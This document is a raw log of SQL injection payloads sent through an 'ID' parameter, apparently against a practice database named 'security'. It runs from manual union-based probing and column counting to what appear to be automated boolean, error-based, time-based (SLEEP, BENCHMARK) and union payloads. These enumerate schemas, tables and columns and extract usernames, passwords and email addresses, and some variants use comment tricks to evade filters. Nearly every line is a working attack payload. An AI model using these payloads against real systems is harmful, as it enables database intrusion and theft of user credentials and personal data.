ID:-1' union select 1,concat('Test by X123',0x3c62723e,user(),0x3c62723e,database(),0x3c62723e,(select (@a) from (select (@a:=0x00),(select (@a) from (information_Schema.columns) where table_schema != 'information_schema' and  (@a) in (@a:=concat(@a,'Tabls:::',table_name,'::::::::::Columns::::::::::::',column_name,'<br>'))))a)),3 -- -
ID:-1' union select 1,concat(0x3c62723e,'Test by X123',0x3c62723e,user(),0x3c62723e,database(),0x3c62723e,(select (@a) from (select (@a:=0x00),(select (@a) from (information_Schema.columns) where table_schema != 'information_schema' and  (@a) in (@a:=concat(@a,'Tabls:::',table_name,'::::::::::Columns::::::::::::',column_name,'<br>'))))a)),3 -- -
ID:-1' union select 1,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),Concat(0x3c2f6469763e,LPAD(@running_number:=@running_number+1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e), 0x00),lpad(@z:=@z+1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),3 -- -
ID:-1' union select 1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c74723e3c74643e3c666f6e7420636f6c6f723d7265642073697a653d333e266e6273703b266e6273703b266e6273703b,table_schema,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e266e6273703b266e6273703b266e6273703b,table_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75652073697a653d333e,column_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c2f74723e))))x),3 -- -
ID:-1' union select 1,(/*!50000select*/ concat (@:=0,(/*!50000select*/ count(*) from /*!50000information_schema.tables*/ WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND@:=concat (@,0x3c62723e,/*!50000table_name*/)),@)),3 -- -
ID:-1' union select 1,(/*!12345SeLecT*/ (@a) /*!12345FrOm*/ ( /*!12345SelEct(@a:=0x00)*/,(/*!12345SelEct*/ (@a) /*!12345FrOm*/ (/*!12345InForMAtion_SchEma.Tables*/) /*!12345WhEre*/ /*!12345TaBle_ScHema*/ !=0x696e466f526d6154696f4e5f536368656d61 /*!12345And*/ (@a) /*!12345in*/ (@a:=concat(@a,/*!12345TablE_naME*/,0x3c62723e))))a),3 -- -
ID:1
ID:10
ID:1
ID:1'
ID:1'
ID:1"
ID:1'
ID:1' -- -
ID:1' -- -
ID:1' --
ID:1' -- 
ID:1'  order by 1 -- 
ID:1'  order by 10 -- 
ID:1'  order by 5 -- 
ID:1'  order by 4 -- 
ID:1'  order by 3-- 
ID:1'  order by 4-- 
ID:1'  order by 3-- 
ID:1' union select 1,2,3 -- 
ID:1' union select 1,2 -- 
ID:1' union select 1,2,3,4 -- 
ID:1' union select 1,2,3 -- 
ID:1' union select 1,2,3 -- 
ID:.1' union select 1,2,3 -- 
ID:0' union select 1,2,3 -- 
ID:0' union select 1,user()2,3 -- 
ID:0' union select 1,user(),3 -- 
ID:0' union select 1,user(),database()-- 
ID:0' union select 1,@@version,database()-- 
ID:0' union select 1,table_name,3  from information_schema.tables where table_Schema=database() -- 
ID:0' union select 1,group_concat(table_name),3  from information_schema.tables where table_Schema=database() -- 
ID:0' union select 1,group_concat(column_name),3  from information_schema.columns where table_name="users" -- 
ID:0' union select 1,group_concat(id,username,password),3  from users -- 
ID:0' union select 1,group_concat(id,username,password,'<br>'),3  from users -- 
ID:0' union select 1,group_concat(id,'::',username,'::',password,'<br>'),3  from users -- 
ID:1' -- -
ID:1
ID:1
ID:4681
ID:1,",(('(.(.
ID:1'XttyBy<'">xbuAjA
ID:1) AND 7536=5936 AND (2994=2994
ID:1) AND 2591=2591 AND (7395=7395
ID:1 AND 2289=1803
ID:1 AND 2591=2591
ID:1 AND 8629=7840-- xgWL
ID:1 AND 2591=2591-- YMIe
ID:1') AND 8795=4322 AND ('bGJC'='bGJC
ID:1') AND 2591=2591 AND ('ZzrB'='ZzrB
ID:1' AND 1060=5975 AND 'cOux'='cOux
ID:1' AND 2591=2591 AND 'HZBK'='HZBK
ID:1' AND 5260=3132 AND 'dryc'='dryc
ID:1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a767871,(SELECT (ELT(8289=8289,1))),0x7170716a71,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'xKXE'='xKXE
ID:1' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a767871,(SELECT (ELT(8483=8483,1))),0x7170716a71,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'jGbs'='jGbs
ID:1' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x717a767871,(SELECT (ELT(3040=3040,1))),0x7170716a71,0x78))x)) AND 'vMCS'='vMCS
ID:1' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x717a767871,(SELECT (ELT(2060=2060,1))),0x7170716a71,0x78))x)) AND 'Ludo'='Ludo
ID:1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x717a767871,(SELECT (ELT(1753=1753,1))),0x7170716a71)) USING utf8))) AND 'BPMI'='BPMI
ID:1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x717a767871,(SELECT (ELT(2905=2905,1))),0x7170716a71)) USING utf8))) AND 'fVOl'='fVOl
ID:1' AND (SELECT 1523 FROM(SELECT COUNT(*),CONCAT(0x717a767871,(SELECT (ELT(1523=1523,1))),0x7170716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'jMaX'='jMaX
ID:(SELECT CONCAT(0x717a767871,(SELECT (ELT(8201=8201,1))),0x7170716a71))
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1';SELECT SLEEP(5)#
ID:1';SELECT SLEEP(5) AND 'DYKh'='DYKh
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))EkDH)#
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))rnRD) AND 'tnbR'='tnbR
ID:1';SELECT BENCHMARK(5000000,MD5(0x6554487a))#
ID:1';SELECT BENCHMARK(5000000,MD5(0x7a757767)) AND 'wwqH'='wwqH
ID:1' AND (SELECT 8273 FROM (SELECT(SLEEP(5)))XoJw) AND 'rBdU'='rBdU
ID:1' AND (SELECT 8273 FROM (SELECT(SLEEP(0)))XoJw) AND 'rBdU'='rBdU
ID:1' AND (SELECT 8273 FROM (SELECT(SLEEP(5)))XoJw) AND 'rBdU'='rBdU
ID:1' ORDER BY 1-- mGSB
ID:1' ORDER BY 3569-- sxpP
ID:1' ORDER BY 10-- SZHr
ID:1' ORDER BY 6-- lEiH
ID:1' ORDER BY 4-- EloB
ID:1' ORDER BY 3-- GSkj
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a767871,0x4a765249504f646b616e427379687249576a45764f4c4b64554a63447053704f43484d756d45434b,0x7170716a71)-- MGLf
ID:1' UNION ALL SELECT CONCAT(0x717a767871,0x704346724e635454654f5076466954526a584a65707042764842474d644a596a6b42577255566e6d,0x7170716a71),NULL,NULL-- TQEc
ID:1' UNION ALL SELECT NULL,CONCAT(0x717a767871,0x7a766c4f437957456944645744417844666c57434b4e6a4e7a48564a7465516c415a485165694959,0x7170716a71),NULL-- tFIf
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a767871,0x484c7249465a4174554d,0x7170716a71)-- meDm
ID:1' UNION ALL SELECT CONCAT(0x717a767871,0x44425a784e4c67536276,0x7170716a71),NULL,NULL-- aDiS
ID:1' UNION ALL SELECT NULL,CONCAT(0x717a767871,0x7455566c5a6c43645062,0x7170716a71),NULL-- sXQr
ID:-8159' UNION ALL SELECT CONCAT(0x717a767871,0x5474447854656d794b6b47724845585378666f786c5a484e747a626f76476a4a43627974614c6e4d,0x7170716a71),NULL,NULL-- hXWF
ID:-8079' UNION ALL SELECT NULL,NULL,CONCAT(0x717a767871,0x78537971715554576559477868494a6b61634d61557046494d69694b6b466e724b4f5471726c4275,0x7170716a71)-- ZBpI
ID:-4752' UNION ALL SELECT NULL,NULL,CONCAT(0x717a767871,(CASE WHEN (8142=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                8142) THEN 1 ELSE 0 END),0x7170716a71)-- GirF
ID:-3370' UNION ALL SELECT NULL,NULL,CONCAT(0x717a767871,IFNULL(CAST(COUNT(schema_name) AS NCHAR),0x20),0x7170716a71) FROM INFORMATION_SCHEMA.SCHEMATA-- vsWm
ID:-7620' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a767871,IFNULL(CAST(schema_name AS NCHAR),0x20),0x7170716a71) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1)-- AoUz
ID:-6152' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a767871,IFNULL(CAST(schema_name AS NCHAR),0x20),0x7170716a71) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1)-- KGrk
ID:-1078' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a767871,IFNULL(CAST(schema_name AS NCHAR),0x20),0x7170716a71) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1)-- hDdK
ID:-4554' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a767871,IFNULL(CAST(schema_name AS NCHAR),0x20),0x7170716a71) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1)-- dfFH
ID:-1380' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a767871,IFNULL(CAST(schema_name AS NCHAR),0x20),0x7170716a71) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1)-- jWsX
ID:-9330' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a767871,IFNULL(CAST(schema_name AS NCHAR),0x20),0x7170716a71) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1)-- sqoG
ID:-3026' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a767871,IFNULL(CAST(schema_name AS NCHAR),0x20),0x7170716a71) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1)-- gSAg
ID:-6453' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a767871,IFNULL(CAST(schema_name AS NCHAR),0x20),0x7170716a71) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1)-- gIYw
ID:1
ID:-7044' UNION ALL SELECT NULL,NULL,CONCAT(0x717a767871,IFNULL(CAST(COUNT(table_name) AS NCHAR),0x20),0x7170716a71) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479)-- onQj
ID:-2789' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a767871,IFNULL(CAST(table_name AS NCHAR),0x20),0x7170716a71) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479) LIMIT 0,1)-- bBKs
ID:-9003' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a767871,IFNULL(CAST(table_name AS NCHAR),0x20),0x7170716a71) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479) LIMIT 1,1)-- ItxM
ID:-1472' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a767871,IFNULL(CAST(table_name AS NCHAR),0x20),0x7170716a71) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479) LIMIT 2,1)-- MBEj
ID:-9234' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a767871,IFNULL(CAST(table_name AS NCHAR),0x20),0x7170716a71) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479) LIMIT 3,1)-- Qwfj
ID:1
ID:-9220' UNION ALL SELECT NULL,NULL,CONCAT(0x717a767871,IFNULL(CAST(COUNT(*) AS NCHAR),0x20),0x7170716a71) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479-- Gwea
ID:-6695' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a767871,IFNULL(CAST(column_name AS NCHAR),0x20),0x6a7765627372,IFNULL(CAST(column_type AS NCHAR),0x20),0x7170716a71) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 0,1)-- bNxj
ID:-1443' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a767871,IFNULL(CAST(column_name AS NCHAR),0x20),0x6a7765627372,IFNULL(CAST(column_type AS NCHAR),0x20),0x7170716a71) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 1,1)-- DkrU
ID:-2826' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a767871,IFNULL(CAST(column_name AS NCHAR),0x20),0x6a7765627372,IFNULL(CAST(column_type AS NCHAR),0x20),0x7170716a71) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479 LIMIT 2,1)-- tWtr
ID:1
ID:-4089' UNION ALL SELECT NULL,NULL,CONCAT(0x717a767871,IFNULL(CAST(COUNT(*) AS NCHAR),0x20),0x7170716a71) FROM security.users-- wwNb
ID:-1190' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a767871,IFNULL(CAST(id AS NCHAR),0x20),0x6a7765627372,IFNULL(CAST(password AS NCHAR),0x20),0x6a7765627372,IFNULL(CAST(username AS NCHAR),0x20),0x7170716a71) FROM security.users LIMIT 0,1)-- yUba
ID:-6973' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a767871,IFNULL(CAST(id AS NCHAR),0x20),0x6a7765627372,IFNULL(CAST(password AS NCHAR),0x20),0x6a7765627372,IFNULL(CAST(username AS NCHAR),0x20),0x7170716a71) FROM security.users LIMIT 1,1)-- mKIX
ID:-2688' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a767871,IFNULL(CAST(id AS NCHAR),0x20),0x6a7765627372,IFNULL(CAST(password AS NCHAR),0x20),0x6a7765627372,IFNULL(CAST(username AS NCHAR),0x20),0x7170716a71) FROM security.users LIMIT 2,1)-- loZK
ID:-5738' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a767871,IFNULL(CAST(id AS NCHAR),0x20),0x6a7765627372,IFNULL(CAST(password AS NCHAR),0x20),0x6a7765627372,IFNULL(CAST(username AS NCHAR),0x20),0x7170716a71) FROM security.users LIMIT 3,1)-- BZcW
ID:-8868' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a767871,IFNULL(CAST(id AS NCHAR),0x20),0x6a7765627372,IFNULL(CAST(password AS NCHAR),0x20),0x6a7765627372,IFNULL(CAST(username AS NCHAR),0x20),0x7170716a71) FROM security.users LIMIT 4,1)-- xlIQ
ID:-2220' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a767871,IFNULL(CAST(id AS NCHAR),0x20),0x6a7765627372,IFNULL(CAST(password AS NCHAR),0x20),0x6a7765627372,IFNULL(CAST(username AS NCHAR),0x20),0x7170716a71) FROM security.users LIMIT 5,1)-- JSjd
ID:-6477' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a767871,IFNULL(CAST(id AS NCHAR),0x20),0x6a7765627372,IFNULL(CAST(password AS NCHAR),0x20),0x6a7765627372,IFNULL(CAST(username AS NCHAR),0x20),0x7170716a71) FROM security.users LIMIT 6,1)-- WlIT
ID:-9367' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a767871,IFNULL(CAST(id AS NCHAR),0x20),0x6a7765627372,IFNULL(CAST(password AS NCHAR),0x20),0x6a7765627372,IFNULL(CAST(username AS NCHAR),0x20),0x7170716a71) FROM security.users LIMIT 7,1)-- Hsqh
ID:-2001' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a767871,IFNULL(CAST(id AS NCHAR),0x20),0x6a7765627372,IFNULL(CAST(password AS NCHAR),0x20),0x6a7765627372,IFNULL(CAST(username AS NCHAR),0x20),0x7170716a71) FROM security.users LIMIT 8,1)-- auXQ
ID:-5663' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a767871,IFNULL(CAST(id AS NCHAR),0x20),0x6a7765627372,IFNULL(CAST(password AS NCHAR),0x20),0x6a7765627372,IFNULL(CAST(username AS NCHAR),0x20),0x7170716a71) FROM security.users LIMIT 9,1)-- nsGz
ID:-5624' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a767871,IFNULL(CAST(id AS NCHAR),0x20),0x6a7765627372,IFNULL(CAST(password AS NCHAR),0x20),0x6a7765627372,IFNULL(CAST(username AS NCHAR),0x20),0x7170716a71) FROM security.users LIMIT 10,1)-- obQH
ID:-8670' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a767871,IFNULL(CAST(id AS NCHAR),0x20),0x6a7765627372,IFNULL(CAST(password AS NCHAR),0x20),0x6a7765627372,IFNULL(CAST(username AS NCHAR),0x20),0x7170716a71) FROM security.users LIMIT 11,1)-- oFnn
ID:-6679' UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x717a767871,IFNULL(CAST(id AS NCHAR),0x20),0x6a7765627372,IFNULL(CAST(password AS NCHAR),0x20),0x6a7765627372,IFNULL(CAST(username AS NCHAR),0x20),0x7170716a71) FROM security.users LIMIT 12,1)-- fchx
ID:1
ID:1
ID:1
ID:6352
ID:1.))',),)".
ID:1'bZxELI<'">eJtxBj
ID:1) AND 4774=3633 AND (6740=6740
ID:1) AND 7351=7351 AND (6597=6597
ID:1 AND 5821=1828
ID:1 AND 7351=7351
ID:1 AND 1902=9697-- gBZu
ID:1 AND 7351=7351-- kVjG
ID:1') AND 3195=4879 AND ('XWcX'='XWcX
ID:1') AND 7351=7351 AND ('ipxE'='ipxE
ID:1' AND 8958=7684 AND 'HwjV'='HwjV
ID:1' AND 7351=7351 AND 'sqfq'='sqfq
ID:1' AND 5103=1149 AND 'vVfA'='vVfA
ID:(SELECT CONCAT(CONCAT(0x7171767671,(CASE WHEN (7868=7868) THEN 0x31 ELSE 0x30 END)),0x71706b7871))
ID:1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7171767671,(SELECT (ELT(3362=3362,1))),0x71706b7871,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'rLxw'='rLxw
ID:1' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7171767671,(SELECT (ELT(5880=5880,1))),0x71706b7871,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'dgqt'='dgqt
ID:1' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7171767671,(SELECT (ELT(6324=6324,1))),0x71706b7871,0x78))x)) AND 'tIch'='tIch
ID:1' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7171767671,(SELECT (ELT(8004=8004,1))),0x71706b7871,0x78))x)) AND 'lGKd'='lGKd
ID:1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7171767671,(SELECT (ELT(8426=8426,1))),0x71706b7871)) USING utf8))) AND 'jRHU'='jRHU
ID:1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7171767671,(SELECT (ELT(7065=7065,1))),0x71706b7871)) USING utf8))) AND 'Paed'='Paed
ID:1' AND (SELECT 8399 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT (ELT(8399=8399,1))),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'PGja'='PGja
ID:(SELECT CONCAT(0x7171767671,(ELT(4714=4714,1)),0x71706b7871))
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1';SELECT SLEEP(5)#
ID:1';SELECT SLEEP(5) AND 'dEgM'='dEgM
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))UrZi)#
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))HKVs) AND 'wYRH'='wYRH
ID:1';SELECT BENCHMARK(5000000,MD5(0x79494e44))#
ID:1';SELECT BENCHMARK(5000000,MD5(0x77586b72)) AND 'YWLm'='YWLm
ID:1' AND (SELECT 2954 FROM (SELECT(SLEEP(5)))DFOD) AND 'SaDr'='SaDr
ID:1' AND (SELECT 2954 FROM (SELECT(SLEEP(0)))DFOD) AND 'SaDr'='SaDr
ID:1' AND (SELECT 2954 FROM (SELECT(SLEEP(5)))DFOD) AND 'SaDr'='SaDr
ID:1' ORDER BY 1-- -
ID:1' ORDER BY 6217-- -
ID:1' ORDER BY 10-- -
ID:1' ORDER BY 6-- -
ID:1' ORDER BY 4-- -
ID:1' ORDER BY 3-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x7171767671,0x72616a4f48596b4448724a7163796f72617954436b767271726f5a7278715968475866467853724c,0x71706b7871)-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x7171767671,0x4d415344724c586c5a4253477963716d7a6249735a62674d6451556379477a467261474d41716252,0x71706b7871),NULL-- -
ID:1' UNION ALL SELECT CONCAT(0x7171767671,0x66626a6c4d436d667242646e6b694f416e4764476b7059626e736c557a4f6d6d7864776579664d57,0x71706b7871),NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x7171767671,0x6a527a424a4d4f694d63,0x71706b7871)-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x7171767671,0x7755566867626b474741,0x71706b7871),NULL-- -
ID:1' UNION ALL SELECT CONCAT(0x7171767671,0x516c594246626a436e6f,0x71706b7871),NULL,NULL-- -
ID:-5504' UNION ALL SELECT NULL,CONCAT(0x7171767671,0x64587a71665a767370554c6f555454597a524466454c7a67554269724662756255764462584d566d,0x71706b7871),NULL-- -
ID:-6379' UNION ALL SELECT NULL,CONCAT(0x7171767671,(CASE WHEN (5028=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5028) THEN 1 ELSE 0 END),0x71706b7871),NULL-- -
ID:-7484' UNION ALL SELECT NULL,CONCAT(0x7171767671,(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END),0x71706b7871),NULL-- -
ID:-5671' UNION ALL SELECT NULL,CONCAT(0x7171767671,IFNULL(CAST(COUNT(schema_name) AS NCHAR),0x20),0x71706b7871),NULL FROM INFORMATION_SCHEMA.SCHEMATA-- -
ID:-3970' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(schema_name AS NCHAR),0x20),0x71706b7871) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),NULL-- -
ID:-2761' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(schema_name AS NCHAR),0x20),0x71706b7871) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),NULL-- -
ID:-4212' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(schema_name AS NCHAR),0x20),0x71706b7871) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),NULL-- -
ID:-8336' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(schema_name AS NCHAR),0x20),0x71706b7871) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),NULL-- -
ID:-9421' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(schema_name AS NCHAR),0x20),0x71706b7871) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),NULL-- -
ID:-3668' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(schema_name AS NCHAR),0x20),0x71706b7871) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),NULL-- -
ID:-9142' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(schema_name AS NCHAR),0x20),0x71706b7871) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),NULL-- -
ID:-4410' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(schema_name AS NCHAR),0x20),0x71706b7871) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),NULL-- -
ID:1
ID:-7649' UNION ALL SELECT NULL,CONCAT(0x7171767671,IFNULL(CAST(COUNT(table_name) AS NCHAR),0x20),0x71706b7871),NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479)-- -
ID:-2968' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(table_name AS NCHAR),0x20),0x71706b7871) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479) LIMIT 0,1),NULL-- -
ID:-8727' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(table_name AS NCHAR),0x20),0x71706b7871) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479) LIMIT 1,1),NULL-- -
ID:-9854' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(table_name AS NCHAR),0x20),0x71706b7871) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479) LIMIT 2,1),NULL-- -
ID:-5276' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(table_name AS NCHAR),0x20),0x71706b7871) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479) LIMIT 3,1),NULL-- -
ID:1
ID:-2741' UNION ALL SELECT NULL,CONCAT(0x7171767671,IFNULL(CAST(COUNT(*) AS NCHAR),0x20),0x71706b7871),NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x656d61696c73 AND table_schema=0x7365637572697479-- -
ID:-4348' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(column_name AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(column_type AS NCHAR),0x20),0x71706b7871) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x656d61696c73 AND table_schema=0x7365637572697479 LIMIT 0,1),NULL-- -
ID:-5381' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(column_name AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(column_type AS NCHAR),0x20),0x71706b7871) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x656d61696c73 AND table_schema=0x7365637572697479 LIMIT 1,1),NULL-- -
ID:1
ID:-1169' UNION ALL SELECT NULL,CONCAT(0x7171767671,IFNULL(CAST(COUNT(*) AS NCHAR),0x20),0x71706b7871),NULL FROM `security`.emails-- -
ID:-5575' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(`email-id` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(`id` AS NCHAR),0x20),0x71706b7871) FROM `security`.emails ORDER BY `id` LIMIT 0,1),NULL-- -
ID:-3456' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(`email-id` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(`id` AS NCHAR),0x20),0x71706b7871) FROM `security`.emails ORDER BY `id` LIMIT 1,1),NULL-- -
ID:-4981' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(`email-id` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(`id` AS NCHAR),0x20),0x71706b7871) FROM `security`.emails ORDER BY `id` LIMIT 2,1),NULL-- -
ID:-5376' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(`email-id` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(`id` AS NCHAR),0x20),0x71706b7871) FROM `security`.emails ORDER BY `id` LIMIT 3,1),NULL-- -
ID:-9753' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(`email-id` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(`id` AS NCHAR),0x20),0x71706b7871) FROM `security`.emails ORDER BY `id` LIMIT 4,1),NULL-- -
ID:-9714' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(`email-id` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(`id` AS NCHAR),0x20),0x71706b7871) FROM `security`.emails ORDER BY `id` LIMIT 5,1),NULL-- -
ID:-2469' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(`email-id` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(`id` AS NCHAR),0x20),0x71706b7871) FROM `security`.emails ORDER BY `id` LIMIT 6,1),NULL-- -
ID:-6592' UNION ALL SELECT NULL,(SELECT CONCAT(0x7171767671,IFNULL(CAST(`email-id` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(`id` AS NCHAR),0x20),0x71706b7871) FROM `security`.emails ORDER BY `id` LIMIT 7,1),NULL-- -
ID:-7678' UNION ALL SELECT NULL,CONCAT(0x7171767671,IFNULL(CAST(`email-id` AS NCHAR),0x20),0x656d787a6166,IFNULL(CAST(`id` AS NCHAR),0x20),0x71706b7871),NULL FROM `security`.emails ORDER BY `id`-- -
